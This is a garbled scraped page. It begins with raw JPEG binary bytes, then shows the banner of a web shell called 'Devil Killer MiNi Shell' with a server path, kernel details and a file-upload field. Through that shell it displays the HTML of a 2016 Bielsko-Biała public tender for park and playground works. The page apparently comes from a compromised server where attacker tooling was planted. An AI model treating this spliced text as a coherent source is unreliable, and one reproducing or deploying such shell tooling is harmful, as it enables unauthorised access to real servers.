JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20161012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20161012/322316-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.bip.um.bielsko.pl' target='_blank'>www.bip.um.bielsko.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 322316 - 2016
              z dnia 2016-10-12 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bielsko-Biała: Zagospodarowanie i budowa terenów rekreacyjnych w ramach Budżetu Obywatelskiego w Bielsku-Białej<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Bielsko-Biała - Urząd Miejski w Bielsku-Białej, krajowy numer identyfikacyjny
              51566100000, ul.
              Plac Ratuszowy 
              1,
              43300  
              Bielsko-Biała, woj.
              śląskie, państwo
              Polska, tel.
              334 971 497, e-mail
              , faks
              33 4971786, 8227539.
              <br />
              Adres strony internetowej (URL): www.um.bielsko.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.um.bielsko.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.um.bielsko.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty należy składać  w formie pisemnej, osobiście, za pośrednictwem poczty, kuriera. Pod adres: Wydział Gospodarki Miejskiej Urzędu Miejskiego w Bielsku-Białej, Plac Ratuszowy 7 (parter, pok. nr 6).<br />
                Adres:
                <br />Wydział Gospodarki Miejskiej Urzędu Miejskiego w Bielsku-Białej, Plac Ratuszowy 7 (parter, pok. nr 6).</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zagospodarowanie i budowa terenów rekreacyjnych w ramach Budżetu Obywatelskiego w Bielsku-Białej<br /><b>Numer referencyjny: </b>GM.271.81.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest zagospodarowanie i budowa terenów rekreacyjnych 
w ramach Budżetu Obywatelskiego w Bielsku-Białej.

Z uwagi na specyfikę przedmiotu zamówienia, postępowanie podzielono na części:
Część I: Osiedle Biała Północ: Park rekreacyjny w dzielnicy Biała Północ (Obszary)  zielony skwer.
Część II: Osiedle Mikuszowice Krakowskie: Plac zabaw i siłownia w Mikuszowicach Krakowskich.
Część III:  Osiedle Mikuszowice Krakowskie: Podest betonowy.
Część IV: Centrum rekreacyjno-parkowe w Komorowicach Śląskich.
Część V: Osiedle Straconka: Zagospodarowanie terenu zielonego na cele sportowo-rekreacyjne w Straconce Zielony zakątek  kontynuacja.
Część VI: Osiedle Biała Wschód: Doposażenie Ogródka Jordanowskiego.

Wykonawca może złożyć ofertę na jedną lub kilka części (pod warunkiem, że będzie w stanie wykonać wszystkie części zamówienia - na które ofertę złoży  w wyznaczonym przez Zamawiającego terminie).

Zakres robót obejmuje w szczególności:
	Dla Części I:
Wykonanie utwardzonego skweru wypoczynkowego (nawierzchnia z kostki niefazowanej), nasadzenia drzew i krzewów, zamontowanie 4 ławek z oparciem i 2 koszy na śmieci, ułożenie palisady betonowej, wykonanie chodnika z kostki brukowej betonowej, inwentaryzacja geodezyjna:
a)	chodnik z kostki grubości 6 cm;
b)	wykonanie nawierzchni z kostki niefazowanej;
c)	wykonanie nawierzchni z kory (zrębki);
d)	wykonanie obrzeży i palisady
e)	zieleń, roboty porządkowe i regeneracyjne;
f)	montaż urządzeń zabawowych i małej architektury;
g)	obsługa geodezyjna.

	Dla Części II:
Wykonanie nawierzchni bezpiecznej przerostowej pod cały plac zabaw oraz pod montowane urządzenia siłowni zewnętrznej, zamontowanie zestawu typu zamek, zamontowanie 2 urządzeń siłowni zewnętrznej: Wioślarz + Prasa Nożna, Biegacz + Orbitrek, uporządkowanie terenu, inwentaryzacja geodezyjna:
a)	roboty przygotowawcze;
b)	roboty ziemne  wykonanie wykopu;
c)	wykonanie nawierzchni bezpiecznej, przerostowej;
d)	montaż urządzeń placu zabaw;
e)	montaż urządzeń siłowni zewnętrznej;
f)	uporządkowanie terenu.

	Dla Części III:
Wykonanie utwardzonego placu z betonu C25/30 o gr.10 cm, o powierzchni zacieranej o wymiarach 12 x 12 m, zazbrojoną siatką z prętów fi8 o oczku 10 x 10 cm, posadowioną na podbudowie z kruszywa łamanego gr. 30 cm:
a)	roboty przygotowawcze;
b)	roboty ziemne  wykonanie wykopu;
c)	wykonanie nawierzchni betonowej;
d)	uporządkowanie terenu.

	Dla Części IV:
Chodnik o nawierzchni z kostki brukowej, bezfazowej od ul. Aktorów oraz od ul. Mazańcowickiej, furtka wejściowa w istniejącym ogrodzeniu od ul. Aktorów, ogrodzenie placu zabaw ogrodzeniem systemowym, panelowym z elementami ozdobnymi wraz z dwoma furtkami, rozbiórka istniejącego ogrodzenia, wykonanie nawierzchni bezpiecznej przerostowej pod cały plac zabaw oraz montaż urządzeń placu zabaw (huśtawki mix, 2 kiwaków, huśtawki wagowej, piaskownicy, linarium) i elementów małej architektury (2 ławek parkowych i 1 kosza na śmieci, tablicy z regulaminem), uporządkowanie terenu, inwentaryzacja geodezyjna:
a)	roboty przygotowawcze;
b)	rozbiórka elementów ogrodzeń;
c)	roboty ziemne  wykonanie wykopu;
d)	wykonanie nawierzchni bezpiecznej;
e)	wykonanie nawierzchni z kostki brukowej betonowej;
f)	montaż urządzeń placu zabaw;
g)	montaż urządzeń małej architektury;
h)	ogrodzenie zewnętrzne;
i)	uporządkowanie terenu.

	Dla Części V:
Wykonanie nawierzchni z płyt gumowych, przerostowych, urządzenia zabawowe (piramida wspinaczkowa, huśtawka Bocianie Gniazdo, karuzela, bujak, piaskownica, tablica z regulaminem), uporządkowanie terenu, inwentaryzacja geodezyjna:
a)	   roboty przygotowawcze;
b)	wykonanie nawierzchni bezpiecznej;
c)	montaż urządzeń placu zabaw;
d)	montaż urządzeń małej architektury;
e)	uporządkowanie terenu.
Proszę nie wyceniać niżej wymienionych pozycji przedmiaru:
10d1.2, 11d1.2, 15d.2

	Dla Części VI:
Montaż urządzeń małej architektury (urządzenia do street workout, kosz na śmieci i ławka z oparciem), nawierzchnia bezpieczna przerostowa pod streetworkout, wykonanie chodnika z utwardzonej nawierzchni z kostki brukowej niefazowanej, uporządkowanie terenu, inwentaryzacja geodezyjna:
a)	  roboty przygotowawcze;
b)	wykonanie nawierzchni bezpiecznej;
c)	wykonanie nawierzchni z kostki brukowej;
d)	montaż urządzeń małej architektury;
e)	uporządkowanie terenu.
Proszę nie wyceniać niżej wymienionych pozycji przedmiaru:
20d2.2
<br /><br /><b>II.5) Główny kod CPV: </b>45212220-4<br /><b> Dodatkowe kody CPV:</b>45112723-9,
                45233260-9,
                45236290-9,
                45111200-0,
                45342000-6,
                45223810-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              279435.65<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Określenie warunków: zamawiający nie określił warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Określenie warunków: zamawiający nie określił warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1.	dla części I:
Wykonał w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej jedną robotę budowlaną polegającą na zagospodarowaniu skweru, parku lub zieleńca o wartości nie mniejszej niż 30 000,00 zł brutto (trzydzieści tysięcy złotych 00/100), z załączeniem dowodów określających czy robota ta wykonana została należycie, w szczególności informacją o tym czy robota została wykonana zgodnie z przepisami prawa budowlanego i prawidłowo ukończona. 
Sposób dokonywania oceny spełnienia warunku: na podstawie oświadczenia wykonawcy 
o spełnieniu warunków udziału w postępowaniu i dokumentów, o których mowa w części VI pkt II ppkt 1, 2 i 3 SIWZ.

2.	dla części II:
Wykonał w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej jedną pracę polegającą na budowie placu zabaw lub siłowni zewnętrznej, o wartości nie mniejszej niż 30 000,00 zł brutto (trzydzieści tysięcy złotych 00/100) oraz co najmniej jedną pracę polegającą na wykonaniu nawierzchni bezpiecznej z gumowych mat, o powierzchni min. 100 m2 z załączeniem dowodów określających czy robota ta wykonana została należycie, w szczególności informacją o tym czy robota została wykonana zgodnie z przepisami prawa budowlanego i prawidłowo ukończona. 
Sposób dokonywania oceny spełnienia warunku: na podstawie oświadczenia wykonawcy 
o spełnieniu warunków udziału w postępowaniu i dokumentów, o których mowa w części VI pkt II ppkt 1, 2 i 3 SIWZ.

3.	dla części III:
Zamawiający nie określił warunku w tym zakresie.  

4.	dla części IV:
Wykonał w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej jedną pracę polegającą na budowie placu zabaw, o wartości nie mniejszej niż 30 000,00 zł brutto (trzydzieści tysięcy złotych 00/100) oraz co najmniej jedną pracę polegającą na wykonaniu nawierzchni bezpiecznej z gumowych mat, o powierzchni min. 60 m2 z załączeniem dowodów określających czy robota ta wykonana została należycie, w szczególności informacją o tym czy robota została wykonana zgodnie z przepisami prawa budowlanego 
i prawidłowo ukończona. 
Sposób dokonywania oceny spełnienia warunku: na podstawie oświadczenia wykonawcy 
o spełnieniu warunków udziału w postępowaniu i dokumentów, o których mowa w części VI pkt II ppkt 1, 2 i 3 SIWZ.

5.	dla części V:
Wykonał w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej jedną pracę polegającą na budowie placu zabaw, o wartości nie mniejszej niż 30 000,00 zł brutto (trzydzieści tysięcy złotych 00/100) oraz co najmniej jedną pracę polegającą na wykonaniu nawierzchni bezpiecznej z gumowych mat, o powierzchni min. 100 m2 z załączeniem dowodów określających czy robota ta wykonana została należycie, w szczególności informacją o tym czy robota została wykonana zgodnie z przepisami prawa budowlanego i prawidłowo ukończona. 
Sposób dokonywania oceny spełnienia warunku: na podstawie oświadczenia wykonawcy 
o spełnieniu warunków udziału w postępowaniu i dokumentów, o których mowa w części VI pkt II ppkt 1, 2 i 3 SIWZ.

6.	dla części VI:
Wykonał w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej jedną pracę polegającą na budowie placu zabaw, siłowni zewnętrznej lub zestawu do streetworkout, o wartości nie mniejszej niż 30 000,00 zł brutto (trzydzieści tysięcy złotych 00/100) oraz co najmniej jedną pracę polegającą na wykonaniu nawierzchni bezpiecznej z gumowych mat, o powierzchni min. 100 m2 z załączeniem dowodów określających czy robota ta wykonana została należycie, w szczególności informacją o tym czy robota została wykonana zgodnie z przepisami prawa budowlanego i prawidłowo ukończona. 
Sposób dokonywania oceny spełnienia warunku: na podstawie oświadczenia wykonawcy 
o spełnieniu warunków udziału w postępowaniu i dokumentów, o których mowa w części VI pkt II ppkt 1, 2 i 3 SIWZ.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.
2. Dowody potwierdzające, że roboty wymienione w w/w wykazie zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.
      Dowodami są:
       - referencje lub inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były  
   wykonywane;
       - inne dokumenty  jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest   
   w stanie uzyskać dokumentów, o których mowa powyżej.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.	Pisemne zobowiązanie (w oryginale) innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, w celu udowodnienia, iż Wykonawca będzie dysponował zasobami niezbędnymi na potrzeby realizacji zamówienia  w przypadku, gdy Wykonawca wskaże, że będzie polegał na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów (art. 22a ust. 2 ustawy Pzp).
2.	Oferta przetargowa (w oryginale) sporządzona na formularzu Oferta, 
3.	Kosztorys ofertowy
4.	Pełnomocnictwo (w oryginale) do reprezentowania Wykonawców ubiegających się wspólnie (konsorcja, spółki cywilne) o przedmiotowe zamówienie, określające zakres udzielonego pełnomocnictwa (pełnomocnik winien być powołany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie).
5. Upoważnienie (pełnomocnictwo) (w oryginale bądź potwierdzonej notarialnie za zgodność 
      z oryginałem kopii) do podpisania oferty, dołączone do oferty, o ile nie wynika ono z dokumentów  
      rejestrowych Wykonawcy.
6. Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej 
       w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów.
7. Wykaz urządzeń równoważnych (w oryginale)  Załącznik nr 7 do nin. SIWZ  w przypadku zaoferowania przez Wykonawcę w formularzu Oferta przez Wykonawcę materiałów i urządzeń równoważnych do zastosowanych przez Zamawiającego (wskazanych w SIWZ i jej załącznikach), Wykonawca zobowiązany jest podać w załączniku nr 7 ich nazwę, typ, producenta oraz dane techniczne  parametry techniczne i ruchowe, gabaryty, itp. (odpowiednio do tych danych określonych w dokumentacji przetargowej), a także załączyć niezbędne dokumenty w języku polskim (karty katalogowe producenta, dokumenty opisujące cechy, typ, charakterystykę oraz dokumentację techniczną, itp. oferowanego zamiennika), z których jednoznacznie będzie wynikać, iż posiadają one parametry nie gorsze od parametrów wyspecyfikowanych w SIWZ i jej załącznikach. Zamawiający przed udzieleniem zamówienia, wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia w/w dokumentów.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
